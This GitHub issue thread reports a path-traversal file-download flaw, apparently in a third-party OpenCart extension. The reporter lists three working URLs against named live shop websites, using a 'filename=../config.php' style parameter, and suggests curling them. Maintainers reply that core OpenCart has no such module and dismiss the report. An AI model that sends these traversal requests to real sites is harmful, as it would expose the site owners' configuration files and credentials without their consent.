### ISSUE TITLE
LFI vulnerability in OpenCart

### ISSUE THREAD

**Issue by LittleDyingDuck** [opencart/opencart#11777]
https://hospitalityequipmentonline.com.au/index.php?route=extension/module/document/download&filename=../config.php
https://www.printzone.com.au/index.php?route=extension/module/document/download&filename=../config.php
https://walfer.cz/index.php?route=extension/module/document/download&filename=../index.php

Curl to these. It's an issue with VQMod as far as I understand

**Comment by stalker780** [comment]
Check your extensions. 
As far as I know OC2, OC3 and OC4 have no such module as `document`.
Ask the one who installed you this module or a developer of this extension.

**Comment by danielkerr** [comment]
waste of space!
